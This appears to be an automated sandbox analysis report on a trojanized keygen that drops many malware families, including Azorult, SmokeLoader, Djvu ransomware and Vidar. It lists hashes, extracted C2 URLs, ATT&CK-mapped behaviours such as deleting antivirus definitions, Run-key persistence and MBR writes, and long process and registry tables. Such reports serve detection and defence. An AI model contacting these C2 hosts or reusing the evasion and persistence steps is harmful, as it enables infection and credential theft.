azorult | 6d5307f8ae9c15be09190b6ff1f2c557d7a0519b765b6ef020ac3e7343fb190c

Target

ElectraSoft_FaxMail_Network_keygen_by_aaocg.exe
Size

8.4MB
MD5

7783fb57f7fe810c9dcfbbfda2b47eb6
SHA1

2892bfd93cf7ef01e928960ecd5cc082bca99f3e
SHA256

6d5307f8ae9c15be09190b6ff1f2c557d7a0519b765b6ef020ac3e7343fb190c
SHA512

171a6b1651cd062869a5b979616e54a57b83e14af969d19a8aa344c2d5ed123a5d00ec8a51c2713146b9bfd2ec37c4c335cc0240cb0890b60b768e50cfc7478a

Score

10^/10

azorult djvu plugx pony smokeloader tofsee vidar backdoor bootkit discovery evasion infostealer persistence ransomware rat spyware stealer trojan upx

Malware Config

Extracted

Family

azorult

http://kvaka.li/1210776429.php

Extracted

Family

smokeloader

Version

2020

http://naritouzina.net/

http://nukaraguasleep.net/

http://notfortuaj.net/

http://natuturalistic.net/

http://zaniolofusa.net/

rc4.i32

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
evasion

Disabling Security Tools
T1089

Command-Line Interface
T1059

Processes:

mpcmdrun.exe

pid process

2268 mpcmdrun.exe
Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
PlugX
PlugX is a RAT (Remote Access Trojan) that has been around since 2008.
trojan plugx
Pony,Fareit
Pony is a Remote Access Trojan application that steals information.
rat spyware stealer pony
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
Creates new service(s) 1 TTPs
persistence

New Service
T1050
Drops file in Drivers directory 1 IoCs

Processes:

updatewin2.exe

description ioc process

File opened for modification C:\Windows\System32\drivers\etc\hosts updatewin2.exe

pid	process
2268	mpcmdrun.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	updatewin2.exe

Executes dropped EXE 46 IoCs

Processes:

keygen-step-3.exekeygen-step-1.exekeygen-pr.exeintro.exekeygen-pr.exekeygen-step-1.exekeygen-step-3.exekeygen-step-4.exekey.exe002.exeLZMA.exekey.exeSetup.exe1609004644016.exeThunderFW.exeMiniThunderPlatform.exe23e04c4f32ef2158.exe23e04c4f32ef2158.tmpseed.sfx.exeseed.exemd2_2efs.exehjjgaa.exejfiag3g_gg.exejfiag3g_gg.exe7B2C.exe7C08.exe7F35.exe7B2C.exe8205.exe869A.exeupdatewin1.exeLZMA.exebbcnijhp.exeupdatewin2.exe8B3E.exe9189.exeupdatewin.exe9189.exe9860.exe5.exe9F75.exeupdatewin1.exeEC5E.exeFA68.exeD74.exeSmartClock.exe

pid	process
2944	keygen-step-3.exe
1268	keygen-step-1.exe
672	keygen-pr.exe
1728	intro.exe
492	keygen-pr.exe
2836	keygen-step-1.exe
2736	keygen-step-3.exe
2772	keygen-step-4.exe
3592	key.exe
508	002.exe
1304	LZMA.exe
1732	key.exe
3800	Setup.exe
2284	1609004644016.exe
1872	ThunderFW.exe
3940	MiniThunderPlatform.exe
1824	23e04c4f32ef2158.exe
1440	23e04c4f32ef2158.tmp
3816	seed.sfx.exe
3968	seed.exe
4420	md2_2efs.exe
4432	hjjgaa.exe
4612	jfiag3g_gg.exe
4852	jfiag3g_gg.exe
4908	7B2C.exe
4920	7C08.exe
1188	7F35.exe
1852	7B2C.exe
4556	8205.exe
5000	869A.exe
1412	updatewin1.exe
1140	LZMA.exe
3464	bbcnijhp.exe
4636	updatewin2.exe
3936	8B3E.exe
5024	9189.exe
5084	updatewin.exe
856	9189.exe
4944	9860.exe
4912	5.exe
2068	9F75.exe
4516	updatewin1.exe
2924	EC5E.exe
188	FA68.exe
4880	D74.exe
4584	SmartClock.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Program Files (x86)\Seed Trade\Seed\seed.exe	upx
C:\Program Files (x86)\Seed Trade\Seed\seed.exe	upx

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation cmd.exe
Drops startup file 1 IoCs

Processes:

D74.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk D74.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation	cmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk	D74.exe

Loads dropped DLL 18 IoCs

Processes:

LZMA.exeSetup.exeMiniThunderPlatform.exeseed.exeLZMA.exe8B3E.exe7F35.exe9189.exe5.exe

pid	process
1304	LZMA.exe
3800	Setup.exe
3800	Setup.exe
3940	MiniThunderPlatform.exe
3940	MiniThunderPlatform.exe
3940	MiniThunderPlatform.exe
3940	MiniThunderPlatform.exe
3940	MiniThunderPlatform.exe
3940	MiniThunderPlatform.exe
3940	MiniThunderPlatform.exe
3968	seed.exe
1140	LZMA.exe
3936	8B3E.exe
1188	7F35.exe
1188	7F35.exe
856	9189.exe
4912	5.exe
4912	5.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

5056 icacls.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
5056	icacls.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

7B2C.exe9F75.exehjjgaa.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\c5c40f24-c0eb-4c11-97a7-2cb9551a1c3f\\7B2C.exe\" --AutoStart"	7B2C.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e"	9F75.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	hjjgaa.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

9860.exemd2_2efs.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	9860.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe

JavaScript code in executable 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\download\download_engine.dll	js
\Users\Admin\AppData\Local\Temp\download\download_engine.dll	js

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

114 ip-api.com
124 api.2ip.ua
125 api.2ip.ua
132 api.2ip.ua
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1067

Processes:

MiniThunderPlatform.exeFA68.exe

description ioc process

File opened for modification \??\PhysicalDrive0 MiniThunderPlatform.exe
File opened for modification \??\PHYSICALDRIVE0 FA68.exe

flow	ioc
114	ip-api.com
124	api.2ip.ua
125	api.2ip.ua
132	api.2ip.ua

description	ioc	process
File opened for modification	\??\PhysicalDrive0	MiniThunderPlatform.exe
File opened for modification	\??\PHYSICALDRIVE0	FA68.exe

Drops file in System32 directory 2 IoCs

Processes:

svchost.exe

description	ioc	process
File created	C:\Windows\SysWOW64\config\systemprofile:.repos	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile:.repos	svchost.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

key.exebbcnijhp.exe9189.exe

description	pid	process	target process
PID 3592 set thread context of 1732	3592	key.exe	key.exe
PID 3464 set thread context of 5076	3464	bbcnijhp.exe	svchost.exe
PID 5024 set thread context of 856	5024	9189.exe	9189.exe

Drops file in Program Files directory 41 IoCs

Processes:

23e04c4f32ef2158.tmpseed.sfx.exe

description	ioc	process
File created	C:\Program Files (x86)\RearRips\is-5DRJF.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\is-P9U77.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\is-2N2LL.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\lang\is-0IRGI.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\is-1H556.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\is-RFEC7.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\is-GF0AB.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\images\is-K3UP7.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\images\is-MOLT4.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\images\is-6DKLG.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\images\is-6OFBJ.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\is-JE3RS.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\is-NO5GI.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\images\is-4DBMR.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\images\is-DKMK3.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\images\is-P31MK.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\Seed Trade\Seed\seed.exe	seed.sfx.exe
File opened for modification	C:\Program Files (x86)\RearRips\seed.sfx.exe	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\is-0BRR6.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\images\is-GIUQG.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\images\is-J3F7N.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\images\is-7HVRV.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\images\is-B4R8S.tmp	23e04c4f32ef2158.tmp
File opened for modification	C:\Program Files (x86)\Seed Trade\Seed	seed.sfx.exe
File opened for modification	C:\Program Files (x86)\RearRips\DreamTrip.exe	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\is-UHMJ9.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\is-R1SLC.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\images\is-82RUE.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\images\is-DJ7KJ.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\lang\is-KTPBS.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\is-6BQ6R.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\images\is-KJL77.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\images\is-G2LVJ.tmp	23e04c4f32ef2158.tmp
File opened for modification	C:\Program Files (x86)\Seed Trade\Seed\seed.exe	seed.sfx.exe
File created	C:\Program Files (x86)\RearRips\unins000.dat	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\is-67Q4P.tmp	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\RearRips\images\is-G7M0J.tmp	23e04c4f32ef2158.tmp
File opened for modification	C:\Program Files (x86)\RearRips\unins000.dat	23e04c4f32ef2158.tmp
File created	C:\Program Files (x86)\Seed Trade\Seed\__tmp_rar_sfx_access_check_259333531	seed.sfx.exe
File created	C:\Program Files (x86)\RearRips\is-H6RJB.tmp	23e04c4f32ef2158.tmp
File opened for modification	C:\Program Files (x86)\Seed Trade	seed.sfx.exe

Drops file in Windows directory 1 IoCs

Processes:

MicrosoftEdge.exe

description ioc process

File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.

description	ioc	process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Checks SCSI registry key(s) 3 TTPs 15 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Setup.exeseed.exe9189.exe8B3E.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	Setup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	Setup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	Setup.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seed.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	9189.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	8B3E.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	Setup.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seed.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	8B3E.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	8B3E.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	9189.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seed.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	9189.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

7F35.exe5.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	7F35.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	7F35.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	5.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

5072 timeout.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

3648 taskkill.exe
4364 taskkill.exe
Modifies Control Panel 1 IoCs
evasion

Processes:

MicrosoftEdge.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\Colors MicrosoftEdge.exe

pid	process
5072	timeout.exe

pid	process
3648	taskkill.exe
4364	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\Colors	MicrosoftEdge.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

Processes:

MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Buses	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Control Panel\Buses\Config0 = 4ced373e1f9af50524edb47d450dd49d084297dce82e72baa46d34fdc48d541d1746969785cd945d24edb47d470dd49d024195daf71261adc06d04fda6e22673bbc9154961cda5691cdf834a703feda8644490bdbd7524ea965b07c9f78d3c74bbc4103d3dffa6641dda8045700db8f2054991cfdb2470dd976d5d8dc4bf662fd39a460b37f9942e569beb092d60b19d4918c58eb27f2ded905b3491abee3571bbd91d5061cda5691cdf834a703feda464c9d442865143bcfc6d34fdc48c541de4da1b4f6f92e72f52edb47d440dd49d6425430beb0814dda46d3731d68e541de4ac4c082afca5690adc87496a35ec9d642df4bd844d14dda46d34fdc48d541de4ad743d04cd945d24edb47d440dd49d642df4bd844d14dda46d34fdc48d541de4ad933c04cd	svchost.exe

Modifies registry class 224 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 4c7728c8aedbd601	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Rating Prompt Shown = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
